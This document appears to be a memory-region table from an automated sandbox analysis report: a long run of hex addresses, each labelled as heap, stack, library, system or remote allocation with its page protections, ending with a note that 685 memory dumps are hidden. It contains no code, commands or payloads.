page read and write
2020000
heap
page read and write
267000
heap
page read and write
726000
heap
page read and write
1B0000
heap
page read and write
5C1000
heap
page read and write
1F60000
heap
page execute and read and write
340E000
stack
page read and write
860000
trusted library allocation
page read and write
560000
heap
page read and write
359E000
stack
page read and write
3610000
heap
page read and write
3C50000
heap
page read and write
2A7000
stack
page read and write
572000
stack
page read and write
4160000
trusted library allocation
page read and write
24AE000
trusted library allocation
page read and write
4D0000
trusted library allocation
page read and write
3449000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
46AD000
stack
page read and write
2520000
heap
page read and write
2ECF000
stack
page read and write
1F4E000
heap
page read and write
248E000
stack
page read and write
49CE000
stack
page read and write
2D7000
heap
page read and write
16B000
stack
page read and write
5CCE000
stack
page read and write
2D6E000
heap
page read and write
4160000
trusted library allocation
page read and write
48E000
heap
page read and write
2D60000
heap
page read and write
6D5000
heap
page read and write
68E000
heap
page read and write
4B1E000
stack
page read and write
405C000
stack
page read and write
89000
stack
page read and write
4160000
trusted library allocation
page read and write
80D000
heap
page read and write
42C0000
trusted library allocation
page read and write
4DDE000
stack
page read and write
650000
heap
page read and write
578000
heap
page read and write
850000
trusted library allocation
page read and write
CF0000
heap
page read and write
2CEA000
heap
page read and write
2421000
trusted library allocation
page read and write
606E000
stack
page read and write
3DD0000
heap
page read and write
86B000
stack
page read and write
44CE000
stack
page read and write
1BC000
stack
page read and write
4160000
trusted library allocation
page read and write
6FB000
heap
page read and write
1F7E000
stack
page read and write
23F000
stack
page read and write
47A000
heap
page read and write
10000
heap
page read and write
2640000
heap
page read and write
261E000
heap
page read and write
4ABE000
stack
page read and write
480000
heap
page read and write
34E000
stack
page read and write
6D0000
heap
page read and write
F20000
heap
page read and write
2C0000
heap
page read and write
285E000
stack
page read and write
15C000
stack
page read and write
4D9E000
stack
page read and write
26D4000
heap
page read and write
556000
stack
page read and write
1E40000
heap
page read and write
26A9000
heap
page read and write
609000
heap
page read and write
2B3B000
heap
page read and write
555000
heap
page read and write
2ACE000
stack
page read and write
BC3000
heap
page read and write
1CA000
trusted library allocation
page read and write
3E99000
trusted library allocation
page read and write
5E5E000
stack
page read and write
10000
heap
page read and write
265C000
heap
page read and write
258E000
stack
page read and write
3D5000
heap
page read and write
16C000
stack
page read and write
2CCA000
heap
page read and write
55B000
stack
page read and write
45AC000
stack
page read and write
4A0000
heap
page read and write
4160000
trusted library allocation
page read and write
3E1F000
stack
page read and write
2681000
heap
page read and write
234F000
stack
page read and write
10016000
direct allocation
page execute and read and write
A4E000
heap
page read and write
23BE000
stack
page read and write
84C000
stack
page read and write
4BC0000
heap
page read and write
3C0000
heap
page read and write
36E000
stack
page read and write
80F000
stack
page read and write
33B9000
trusted library allocation
page read and write
1AD000
trusted library allocation
page execute and read and write
2251000
trusted library allocation
page read and write
4EA2000
heap
page read and write
480000
trusted library allocation
page read and write
260000
heap
page read and write
275E000
stack
page read and write
1F95000
heap
page read and write
292000
heap
page read and write
4B5F000
stack
page read and write
1F93000
heap
page read and write
BC5000
heap
page read and write
4AD000
heap
page read and write
277F000
stack
page read and write
610000
heap
page read and write
2AFB000
heap
page read and write
44C000
stack
page read and write
23C2000
trusted library allocation
page read and write
5AE000
stack
page read and write
2CCA000
heap
page read and write
4160000
trusted library allocation
page read and write
398000
heap
page read and write
167000
stack
page read and write
1DD000
trusted library allocation
page execute and read and write
238A000
trusted library allocation
page read and write
4CAE000
stack
page read and write
271E000
stack
page read and write
10000
heap
page read and write
200000
trusted library allocation
page read and write
289E000
stack
page read and write
30000
heap
page read and write
4D6F000
stack
page read and write
4EA0000
heap
page read and write
240000
trusted library allocation
page read and write
230000
trusted library allocation
page execute and read and write
212C000
stack
page read and write
45D000
system
page execute and read and write
2AF0000
heap
page read and write
637000
heap
page read and write
473000
system
page execute and read and write
41F000
heap
page read and write
300000
heap
page read and write
6C7000
heap
page read and write
3B80000
heap
page read and write
7FF000
heap
page read and write
3370000
trusted library allocation
page read and write
3370000
trusted library allocation
page read and write
24E7000
trusted library allocation
page read and write
5110000
heap
page read and write
1EAC000
stack
page read and write
2CE7000
heap
page read and write
2651000
heap
page read and write
301E000
stack
page read and write
1F0E000
stack
page read and write
720000
heap
page read and write
2E6C000
heap
page read and write
3C0000
heap
page read and write
3CF000
heap
page read and write
68F000
heap
page read and write
1E2000
trusted library allocation
page read and write
1EDD000
heap
page read and write
628E000
stack
page read and write
7AF000
stack
page read and write
1A4000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
38E000
stack
page read and write
438E000
stack
page read and write
1EEA000
stack
page read and write
7D7000
heap
page read and write
644000
heap
page read and write
380000
trusted library allocation
page read and write
950000
heap
page read and write
45FA000
stack
page read and write
70F000
heap
page read and write
601E000
stack
page read and write
4BE000
heap
page read and write
2664000
heap
page read and write
AF0000
heap
page read and write
224E000
stack
page read and write
5CF2000
heap
page read and write
2D5E000
stack
page read and write
7E0000
trusted library allocation
page read and write
20000
heap
page read and write
2155000
trusted library allocation
page read and write
22EF000
stack
page read and write
4A0E000
stack
page read and write
4160000
trusted library allocation
page read and write
1E0D000
stack
page read and write
725000
heap
page read and write
2B7000
trusted library allocation
page read and write
4160000
trusted library allocation
page read and write
896000
heap
page read and write
8A4000
heap
page read and write
807000
heap
page read and write
235E000
stack
page read and write
2E2000
heap
page read and write
6E5000
heap
page read and write
4B5F000
stack
page read and write
433E000
stack
page read and write
1CB000
stack
page read and write
243C000
trusted library allocation
page read and write
B2F000
heap
page read and write
40F0000
trusted library allocation
page read and write
500000
heap
page read and write
26D4000
heap
page read and write
3B0F000
stack
page read and write
231C000
stack
page read and write
3460000
heap
page read and write
35E000
stack
page read and write
3A0000
heap
page read and write
4D5D000
stack
page read and write
3FFB000
heap
page read and write
3292000
heap
page read and write
2CE7000
heap
page read and write
3251000
trusted library allocation
page read and write
2C3C000
heap
page read and write
310000
heap
page read and write
7CF000
stack
page read and write
4180000
heap
page read and write
1B8000
heap
page read and write
606000
heap
page read and write
2600000
trusted library allocation
page read and write
2CB6000
heap
page read and write
4CE000
heap
page read and write
2686000
heap
page read and write
25DE000
stack
page read and write
50CE000
stack
page read and write
2618000
trusted library allocation
page read and write
276000
stack
page read and write
2BE0000
heap
page read and write
620000
heap
page read and write
3E5E000
stack
page read and write
2C4000
heap
page read and write
446000
stack
page read and write
350000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
835000
heap
page read and write
2CE1000
heap
page read and write
1AC000
stack
page read and write
701000
heap
page read and write
2463000
trusted library allocation
page read and write
2C50000
heap
page read and write
5016000
heap
page read and write
682000
heap
page read and write
89C000
heap
page read and write
5B2000
heap
page read and write
4EE3000
heap
page read and write
5CD4000
heap
page read and write
6A8000
heap
page read and write
430000
heap
page read and write
540000
heap
page read and write
4DFD000
heap
page read and write
56A000
heap
page read and write
4E0000
trusted library allocation
page read and write
41F000
system
page execute and read and write
2B9000
trusted library allocation
page read and write
24E5000
trusted library allocation
page read and write
21C0000
heap
page read and write
2B31000
heap
page read and write
267E000
heap
page read and write
2180000
trusted library allocation
page execute and read and write
610000
heap
page read and write
390000
trusted library allocation
page read and write
2CB4000
trusted library allocation
page read and write
7E0000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
4FB0000
heap
page read and write
2645000
heap
page read and write
3020000
heap
page read and write
26DE000
stack
page read and write
3E1000
heap
page read and write
5EAE000
stack
page read and write
4C2E000
stack
page read and write
400000
system
page execute and read and write
455E000
stack
page read and write
890000
heap
page read and write
24F5000
trusted library allocation
page read and write
2724000
trusted library allocation
page read and write
295E000
stack
page read and write
2583000
trusted library allocation
page read and write
2639000
heap
page read and write
394F000
stack
page read and write
255B000
trusted library allocation
page read and write
4D6E000
stack
page read and write | page guard
7B0000
trusted library allocation
page read and write
4E60000
heap
page read and write
2CA6000
trusted library allocation
page read and write
84C000
heap
page read and write
806000
heap
page read and write
2719000
trusted library allocation
page read and write
B80000
heap
page read and write
760000
heap
page read and write
2620000
heap
page read and write
4E3E000
stack
page read and write
2140000
trusted library allocation
page read and write
2152000
trusted library allocation
page read and write
561000
heap
page read and write
530000
trusted library allocation
page read and write
448B000
stack
page read and write
27B000
stack
page read and write
39E000
stack
page read and write
1E0000
trusted library allocation
page read and write
21FF000
stack
page read and write
347D000
heap
page read and write
24A7000
trusted library allocation
page read and write
2B2E000
stack
page read and write
3A000
heap
page read and write
18A000
stack
page read and write
2A2E000
stack
page read and write
6BB000
heap
page read and write
27F000
stack
page read and write
5EE000
heap
page read and write
C30000
heap
page read and write
2440000
trusted library allocation
page read and write
10000
heap
page read and write
1E50000
direct allocation
page read and write
4160000
trusted library allocation
page read and write
1FE0000
trusted library allocation
page read and write
2659000
heap
page read and write
348F000
heap
page read and write
5F5E000
stack
page read and write
6301000
heap
page read and write
4D1000
heap
page read and write
273F000
stack
page read and write
4DDF000
stack
page read and write
680000
heap
page read and write
30000
heap
page read and write
380000
trusted library allocation
page execute and read and write
2580000
heap
page read and write
89C000
heap
page read and write
3EE000
stack
page read and write
7D0000
trusted library allocation
page read and write
3E60000
heap
page read and write
7EF20000
trusted library allocation
page execute and read and write
1A3000
trusted library allocation
page execute and read and write
202000
trusted library allocation
page read and write
1D3000
trusted library allocation
page execute and read and write
4160000
trusted library allocation
page read and write
4E0000
trusted library allocation
page read and write
1DCD000
stack
page read and write
627000
heap
page read and write
5FF000
heap
page read and write
465000
heap
page read and write
2623000
heap
page read and write
569000
heap
page read and write
3FF000
stack
page read and write
2AD6000
trusted library allocation
page read and write
55E000
heap
page read and write
29D000
heap
page read and write
4F8E000
stack
page read and write
27C000
stack
page read and write
A00000
heap
page read and write
2654000
heap
page read and write
20000
heap
page read and write
35DE000
stack
page read and write
7C0000
trusted library allocation
page read and write
27BE000
trusted library allocation
page read and write
2D30000
heap
page read and write
9C7000
heap
page read and write
670000
heap
page read and write
CB0000
heap
page read and write
510000
heap
page read and write
A0F000
heap
page read and write
3EE000
stack
page read and write
2CBE000
heap
page read and write
722000
heap
page read and write
2700000
trusted library allocation
page read and write
295F000
stack
page read and write
1E5000
trusted library allocation
page execute and read and write
228000
stack
page read and write
2CE9000
heap
page read and write
C80000
heap
page read and write
2B3E000
heap
page read and write
4ACE000
stack
page read and write
264C000
heap
page read and write
43FB000
stack
page read and write
390000
heap
page read and write
470000
trusted library allocation
page read and write
2713000
trusted library allocation
page read and write
2EE000
heap
page read and write
255F000
trusted library allocation
page read and write
3B5000
heap
page read and write
3F1F000
stack
page read and write
317000
heap
page read and write
34A4000
heap
page read and write
89C000
heap
page read and write
950000
heap
page read and write
4F0000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
1FF0000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
434000
heap
page read and write
4A7E000
stack
page read and write
49DF000
stack
page read and write
10000
heap
page read and write
10000
heap
page read and write
26AB000
heap
page read and write
2CAD000
heap
page read and write
2AE000
stack
page read and write
4A0000
heap
page read and write
885000
heap
page read and write
5F60000
heap
page read and write
1A0000
trusted library allocation
page read and write
10000
heap
page read and write
459B000
stack
page read and write
3990000
heap
page read and write
20C000
stack
page read and write
45A000
system
page execute and read and write
500000
trusted library allocation
page read and write
560000
heap
page read and write
6070000
heap
page read and write
20AE000
stack
page read and write
10000
heap
page read and write
469000
heap
page read and write
4160000
trusted library allocation
page read and write
1FB000
stack
page read and write
35FF000
stack
page read and write
2210000
heap
page read and write
40F0000
trusted library allocation
page read and write
46F000
stack
page read and write
269E000
heap
page read and write
5E4F000
stack
page read and write
2EE000
stack
page read and write
4A7D000
stack
page read and write
4B0B000
stack
page read and write
630000
heap
page read and write
400B000
heap
page read and write
4EE8000
heap
page read and write
3DE000
stack
page read and write
60D000
stack
page read and write
320000
trusted library allocation
page execute and read and write
2E0000
heap
page read and write
478000
remote allocation
page execute and read and write
207000
trusted library allocation
page execute and read and write
676000
heap
page read and write
518000
heap
page read and write
535000
heap
page read and write
9E5000
heap
page read and write
2CCA000
heap
page read and write
3DBD000
stack
page read and write
2B0000
heap
page read and write
7AE000
stack
page read and write | page guard
5D0000
heap
page read and write
2F60000
heap
page read and write
2E0000
trusted library allocation
page read and write
7F0000
trusted library allocation
page read and write
24BE000
trusted library allocation
page read and write
2290000
heap
page read and write
443F000
stack
page read and write
440000
heap
page read and write
5CD0000
heap
page read and write
2CE1000
heap
page read and write
44CF000
stack
page read and write
22FF000
stack
page read and write
10000
heap
page read and write
88D000
heap
page read and write
857000
heap
page read and write
700000
trusted library allocation
page read and write
2E10000
heap
page read and write
2800000
trusted library allocation
page read and write
2FD000
stack
page read and write
3B4C000
stack
page read and write
374D000
stack
page read and write
310000
trusted library allocation
page read and write
5DE2000
heap
page read and write
617000
heap
page read and write
2D2E000
stack
page read and write
760000
trusted library allocation
page read and write
6C0000
heap
page read and write
1AC000
stack
page read and write
A30000
heap
page read and write
817000
heap
page read and write
4FE000
stack
page read and write
35E000
stack
page read and write
267D000
heap
page read and write
281F000
stack
page read and write
4DE0000
heap
page read and write
8A8000
heap
page read and write
4FC0000
heap
page read and write
521F000
stack
page read and write
1F30000
heap
page read and write
210000
trusted library allocation
page read and write
447E000
stack
page read and write
3F5D000
stack
page read and write
875000
heap
page read and write
261C000
trusted library allocation
page read and write
B0D000
heap
page read and write
26D4000
heap
page read and write
24B1000
trusted library allocation
page read and write
EDF000
stack
page read and write
43E000
heap
page read and write
326E000
stack
page read and write
2200000
trusted library allocation
page execute and read and write
800000
trusted library allocation
page read and write
2B3000
trusted library allocation
page read and write
292000
stack
page read and write
349F000
heap
page read and write
7D0000
heap
page read and write
620000
heap
page read and write
59D000
heap
page read and write
4160000
trusted library allocation
page read and write
40B0000
heap
page read and write
540000
trusted library allocation
page read and write
2AF8000
heap
page read and write
2600000
heap
page read and write
60E000
heap
page read and write
23C0000
trusted library allocation
page read and write
268D000
heap
page read and write
7FD000
heap
page read and write
2699000
heap
page read and write
7F4000
heap
page read and write
456000
system
page execute and read and write
2813000
trusted library allocation
page read and write
2751000
trusted library allocation
page read and write
700000
heap
page read and write
384E000
stack
page read and write
244F000
stack
page read and write
9FB000
heap
page read and write
550000
trusted library allocation
page read and write
4BEE000
stack
page read and write
5B4000
heap
page read and write
6C0000
heap
page read and write
2350000
heap
page read and write
75D000
stack
page read and write
26AC000
trusted library allocation
page read and write
287F000
stack
page read and write
20FE000
stack
page read and write
459000
system
page execute and read and write
95F000
heap
page read and write
8A8000
heap
page read and write
26C4000
trusted library allocation
page read and write
440000
heap
page read and write
2293000
trusted library allocation
page read and write
AC0000
heap
page read and write
33D000
stack
page read and write
450F000
stack
page read and write
42D0000
trusted library allocation
page read and write
7DE000
stack
page read and write
39E000
stack
page read and write
42E0000
trusted library allocation
page read and write
160000
heap
page read and write
45D000
system
page execute and read and write
956000
heap
page read and write
A25000
heap
page read and write
11C000
stack
page read and write
84C000
heap
page read and write
710000
trusted library allocation
page read and write
2CC6000
heap
page read and write
26A1000
heap
page read and write
45C000
system
page execute and read and write
4F0C000
heap
page read and write
28F000
stack
page read and write
5EF000
stack
page read and write
370000
trusted library allocation
page read and write
447000
heap
page read and write
4160000
trusted library allocation
page read and write
270000
heap
page read and write
281E000
stack
page read and write
519D000
stack
page read and write
2681000
heap
page read and write
31A0000
heap
page read and write
5DC4000
heap
page read and write
22EF000
stack
page read and write
1EC0000
heap
page read and write
3370000
trusted library allocation
page read and write
288000
stack
page read and write
2628000
trusted library allocation
page read and write
4BBE000
stack
page read and write
2C8E000
stack
page read and write
2E6000
heap
page read and write
359000
trusted library allocation
page read and write
2B0000
heap
page read and write
2673000
heap
page read and write
67F000
heap
page read and write
655000
heap
page read and write
4A3E000
stack
page read and write
1D0000
trusted library allocation
page read and write
13C000
stack
page read and write
72F000
heap
page read and write
218000
trusted library allocation
page read and write
5DC0000
heap
page read and write
398C000
stack
page read and write
2CDC000
stack
page read and write
5C6E000
stack
page read and write
274000
heap
page read and write
247F000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
2FFE000
stack
page read and write
1FA0000
heap
page read and write
2210000
heap
page execute and read and write
There are 685 hidden memdumps, click here to show them.